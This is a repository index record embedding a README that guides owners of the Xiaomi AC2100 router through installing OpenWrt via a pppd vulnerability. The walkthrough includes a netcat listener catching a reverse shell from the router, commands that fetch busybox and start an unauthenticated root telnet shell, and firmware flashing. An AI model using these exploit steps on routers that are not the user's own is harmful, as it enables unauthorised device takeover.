{"id":15637059,"url":"https://github.com/ecklf/ac2100-openwrt-guide","last_synced_at":"2025-04-15T11:03:40.946Z","repository":{"id":105207720,"uuid":"266348970","full_name":"ecklf/ac2100-openwrt-guide","owner":"ecklf","description":"Install OpenWrt on the AC2100 (black cylinder)","archived":false,"fork":false,"pushed_at":"2020-10-23T11:49:46.000Z","size":57343,"stargazers_count":118,"open_issues_count":2,"forks_count":14,"subscribers_count":14,"default_branch":"master","last_synced_at":"2025-03-28T19:13:19.039Z","etag":null,"topics":["ac2100","guide","openwrt","tutorial","xiaomi"],"latest_commit_sha":null,"homepage":"https://forum.openwrt.org/t/new-xiaomi-router-ac2100/48101","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ecklf.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-05-23T14:06:45.000Z","updated_at":"2025-01-17T01:54:56.000Z","dependencies_parsed_at":null,"dependency_job_id":"0b0cb6d9-c41e-4a53-bb0f-68dea2906f7d","html_url":"https://github.com/ecklf/ac2100-openwrt-guide","commit_stats":{"total_commits":22,"total_committers":2,"mean_commits":11.0,"dds":0.09090909090909094,"last_synced_commit":"5bafb17954338d0fe73204405ec4d3892b84c820"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ecklf%2Fac2100-openwrt-guide","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ecklf%2Fac2100-openwrt-guide/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ecklf%2Fac2100-openwrt-guide/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ecklf%2Fac2100-openwrt-guide/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ecklf","download_url":"https://codeload.github.com/ecklf/ac2100-openwrt-guide/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":249058366,"owners_count":21205910,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ac2100","guide","openwrt","tutorial","xiaomi"],"created_at":"2024-10-03T11:09:45.711Z","updated_at":"2025-04-15T11:03:40.917Z","avatar_url":"https://github.com/ecklf.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# AC2100 OpenWrt Guide\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/router_front.jpg\" /\u003e\n\u003c/p\u003e\n\n## Contents\n\n- [Acknowledgements and resources](#acknowledgements-and-Resources)\n- [Migrating from old image](#migrating-from-old-image)\n- [Intro and Setup](#intro-and-Setup)\n  - [Disclaimer](#disclaimer)\n  - [Requirements](#requirements)\n- [Installing packages (macOS)](#installing-packages-macos)\n- [Installing packages (Ubuntu)](#installing-packages-ubuntu)\n- [Installing OpenWRT](#installing-openwrt)\n    - [1. Download files](#1-download-files)\n    - [2. Reset your router](#2-reset-your-router)\n    - [3. Insert LAN cables](#3-insert-lan-cables)\n    - [4. Setup TCP/IP](#4-setup-tcpip)\n    - [5. Determining your network interface](#5-determining-your-network-interface)\n    - [6. PPPoE simulator](#6-pppoe-simulator)\n    - [7. Running the exploit](#7-running-the-exploit)\n    - [8. Post-install](#8-post-install)\n- [Miscellaneous](#miscellaneous)\n  - [Flash Commands](#flash-commands)\n  - [Prebuilt images by @scp07](#prebuilt-images-by-scp07)\n  - [Translations](#translations)\n\n## Acknowledgements and resources\n\nThis guide is based on the video of [韩风 Talk](https://www.youtube.com/watch?v=xexqu3veedw). Since many people don't know any Mandarin or don't use Windows, I've decided to write down my method of getting this to work. This is also helping people to understand more about the process rather than using a one-click solution.\n\n[pppoe-simulator.py](https://github.com/Percy233/PPPoE_Simulator-for-RM2100-exploit) by Percy233\n\n[pppd-cve.py](https://gist.github.com/namidairo/1e3fb3404c9f148474c06ae6616962f3) by namidairo\n\n## Migrating from old image\n\n**You can skip reading this when you didn't flash with the old guide**.\n\nIn case you used the Chinese Redmi image you can use the `sysupgrade` package provided in this repo. Since the R2100 (Black Cylinder) now is uniquely identified you will need to force the system upgrade.\n\nUse any tool of your choice to transfer the sysupgrade.bin to the `/tmp` directory of your router\n\n```sh\nsysupgrade -v -F -n /tmp/xiaomi-router-sysupgrade.bin\n```\n\n## Intro and Setup\n\nIf you find any mistakes in this guide, _please_ submit a PR 👍🏻.\n\n### **Disclaimer:**\n\n**You can potentially brick your device. I don't take responsibility for any damage caused.**\n\n### Requirements\n\n1. A computer with an ethernet adapter\n2. Two LAN cables\n3. python3, scapy, netcat\n4. Files from this repo\n   - busybox\n   - [pppoe-simulator.py](https://github.com/Percy233/PPPoE_Simulator-for-RM2100-exploit)\n   - [pppd-cve.py](https://gist.github.com/namidairo/1e3fb3404c9f148474c06ae6616962f3)\n   - xiaomi-router-kernel1.bin\n   - xiaomi-router-rootfs0.bin\n\nInstall instructions are available for macOS and Ubuntu. In case you use Windows or an other Linux distribution, I assume you are smart enough to install the required packages yourself.\n\nPlease note that python3 is aliased to `python3` on macOS and Ubuntu (and in some other GNU/Linux distributions). Replace `python3` and `pip3` with `python` and `pip` on Windows - GNU/Linux accordingly.\n\n## Installing packages (macOS)\n\nBefore we start, please check your python version with:\n\n```sh\npython3 --version\n```\n\nVersion 2 will **not** work.\n\n\nIn case you don't have a version of Python installed (or you have the version 2) go to https://brew.sh/ and run the installation script in your terminal, then proceed to install the required packages:\n\n```sh\nbrew install python3 netcat\n```\n\nInstall `scapy` for python:\n\n```sh\npip3 install scapy\n```\n\n## Installing packages (Ubuntu)\n\nThanks to @albertodlc for the instructions.\n\nBefore we start, please open a terminal  (`ctrl + t`) and check your python version with:\n\n```sh\npython3 --version\n```\n\nVersion 2 will **not** work.\n\nIn case you don't have a version of Python installed (or you have the version 2), proceed to install the required packages with:\n\n```sh\nsudo apt update\nsudo apt install python3\nsudo apt install python3-pip\n```\n\nAnd also check if you have all the network packages and dependencies:\n\n```sh\nifconfig\n```\n\nIf it shows an error, run the following command:\n\n```sh\nsudo apt install net-tools\n```\n\nThen install `scapy` and `netcat` for python:\n\n(Don't forget the `sudo` in the first command)\n```sh\nsudo apt install python3-scapy\npip3 install netcat\n```\n\n## Installing OpenWRT\n### 1. Download files\n\n- Clone the repo or download as `.zip`\n- Make a folder with the following files and `cd` into it\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/1.png\" /\u003e\n\u003c/p\u003e\n\nFeel free to use your own images if you know what you are doing. For the case you are using the images in this repo, please ensure the provided `.bin` files have the correct `sha256sum`:\n\n\u003c!-- BEGIN-SHA256SUM --\u003e\n\n```sh\nsha256sum *bin\n63dba28c89e3df484419aa9079c4fc80ef183f1dcc4591d9935c25fde65f49e4  xiaomi-router-initramfs-kernel.bin\ndeb8b1b0c5b9c0ada4f944382ba935c9e1c132faea88818f19790564b3e74fde  xiaomi-router-kernel1.bin\n4b7d9766d8f5454a5733fbb0ad15eee6bf92e18cdbe6a043f755e3812ba21718  xiaomi-router-rootfs0.bin\nc7ee444c818097c67aca16aafdb3e983f3716d05256367e0244db8fc3a0d36b4  xiaomi-router-sysupgrade.bin\n```\n\n\u003c!-- END-SHA256SUM --\u003e\n\n### 2. Reset your router\n\n- Plug in your AC2100\n- Wait for the system light to turn blue\n- Hold the reset button until the light turns yellow\n- Plug out your router\n\n### 3. Insert LAN cables\n\n- Bridge WAN and Port 1 (blue) with your first LAN cable\n- Connect the second LAN cable to Port 2 and your computer (yellow)\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/router_back.jpg\" /\u003e\n\u003c/p\u003e\n\n### 4. Setup TCP/IP\n\n- Go to your network settings\n- Set the following for IPv4\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/2.png\" /\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/2-1.png\" /\u003e\n\u003c/p\u003e\n\n- Plug in your router\n- Wait for the indicator LED to turn blue\n\nYou should now be able to ping the router at `192.168.31.1`.\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/3.png\" /\u003e\n\u003c/p\u003e\n\n### 5. Determining your network interface\n\n- Run `ifconfig`\n- Check for an interface with configured address `192.168.31.177` (see image below)\n- Change the name of your interface in `ppd-cve.py` and `pppoe-simulator.py` (in my case it was en7)\n\n```py\n# Line 5 of both script files\ninterface = \"yourinterface\"\n```\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/4.png\" /\u003e\n\u003c/p\u003e\n\n- Check the MAC address from [`pppd-cve.py`](https://github.com/impulse/ac2100-openwrt-guide/blob/master/pppd-cve.py#L17) and adjust it accordingly to your device (you can check it in the bottom of the router).\n\n```py\n# pppd-cve.py#L17\nif src.startswith(\"your:router:mac\")\n```\n\n### 6. PPPoE simulator\n\n- Open up http://192.168.31.1 in your browser\n- If there is a terms and conditions screen, click on 马上体验\n- Click on 继续配置 (see image)\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/5.png\" /\u003e\n\u003c/p\u003e\n\nStart the `pppoe-simulator`:\n\n```sh\npython3 pppoe-simulator.py\n```\n\nYou may need to run this as `root` for scapy to function properly. The script should show `Waiting for packets`.\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/6.png\" /\u003e\n\u003c/p\u003e\n\nClick on the field that says PPPOE.\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/7.png\" /\u003e\n\u003c/p\u003e\n\nEnter credentials (anything should be fine). I just use `123` for both. After that click on 下一步.\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/8.png\" /\u003e\n\u003c/p\u003e\n\nRequests should now appear in your PPPoE terminal window:\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/9.png\" /\u003e\n\u003c/p\u003e\n\nAlso your web browser should now display this instead of a loading spinner:\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/10.png\" /\u003e\n\u003c/p\u003e\n\n### 7. Running the exploit\n\nOpen up two new terminal sessions.\n\nStart an HTTP server where we can `wget` the files from later. **Make sure to be in the folder that contains the repo files**.\n\n```sh\npython3 -m http.server 80\n```\n\nStart the `netcat` network utility.\n\n```sh\nnetcat -nvlp 31337\n```\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/11.png\" /\u003e\n\u003c/p\u003e\n\nRun `pppd-cve.py` in a new terminal session:\n\n```sh\npython3 pppd-cve.py\n```\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/12.png\" /\u003e\n\u003c/p\u003e\n\nWhen the packet has been sent successfully, you should be able to see a connection from `192.168.31.1:63627` in your `netcat` session.\n\nThis connection can be unstable and you may need to rerun `netcat` and `pppd-cve.py` if it drops.\n\nIf you do the following commands quickly, there should be no issues:\n\n```sh\ncd /tmp\nwget http://192.168.31.177/busybox\nchmod a+x ./busybox\n./busybox telnetd -l /bin/sh\n```\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/13.png\" /\u003e\n\u003c/p\u003e\n\nWe should now have `telnet` access (you can find all commands in `commands.txt`):\n\n```sh\ntelnet 192.168.31.1\n```\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/14.png\" /\u003e\n\u003c/p\u003e\n\nUse `wget` to pull our files from the http server on the router:\n\n```sh\nwget http://192.168.31.177/xiaomi-router-rootfs0.bin\nwget http://192.168.31.177/xiaomi-router-kernel1.bin\u0026\u0026nvram set uart_en=1\u0026\u0026nvram set bootdelay=5\u0026\u0026nvram set flag_try_sys1_failed=1\u0026\u0026nvram commit\n```\n\nObservation: Files are being requested in your http server session:\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/15.png\" /\u003e\n\u003c/p\u003e\n\nAll what is left now is to write our images:\n\n```sh\nmtd write xiaomi-router-kernel1.bin kernel1\nmtd -r write xiaomi-router-rootfs0.bin rootfs0\n```\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/16.png\" /\u003e\n\u003c/p\u003e\n\nYour device should now reboot. First the LED blinks yellow for a couple of seconds before turning blue. When it turns blue again, you now have successfully set up OpenWrt. Congratulations!\n\nWhat you can do now:\n\n- Close all terminal sessions\n- Revert your TCP/IP settings\n- Remove the bridge cable\n- Connect the router to the internet again\n\n### 8. Post-install\n\n#### Connect to your device via `ssh`\n\n```\nusername: root\npassword: password\n```\n\nThe router IP should be visible in your network settings (in my case http://192.168.1.1). LuCI web-interface is configured with HTTPS on this image. To use HTTPS you need to take additional steps to trust the certificate on your machine. If you want to just bypass the HTTPS errors you will need to use Firefox and add an exception.\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/17.png\" /\u003e\n\u003c/p\u003e\n\n```sh\nssh root@routerip\n```\n\n\u003cp align=\"center\"\u003e\n    \u003cimg height=\"auto\" width=\"auto\" src=\"images/18.png\" /\u003e\n\u003c/p\u003e\n\n## Miscellaneous\n\n### Flash commands\n\nPartition names if you are already on OpenWRT:\n\n```sh\nmtd write xiaomi-router-kernel1.bin kernel\nmtd write xiaomi-router-rootfs0.bin ubi\n```\n\nPartition names if you are on stock firmware:\n\n```sh\nmtd write xiaomi-router-kernel1.bin kernel1\nmtd -r write xiaomi-router-rootfs0.bin rootfs0\n```\n\n### Prebuilt images by @scp07\n\nAlso includes stock recovery image.\n\n- [Google Drive](https://drive.google.com/drive/folders/1WTWvOp-6B54hsCDpuo_hf2JKAaUwmZFG)\n\n### Translations\n- [中文 （视频）](https://www.youtube.com/watch?v=xexqu3veedw)\n- [Spanish (Video)](https://youtu.be/RnIs7BHYrT4)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fecklf%2Fac2100-openwrt-guide","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fecklf%2Fac2100-openwrt-guide","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fecklf%2Fac2100-openwrt-guide/lists"}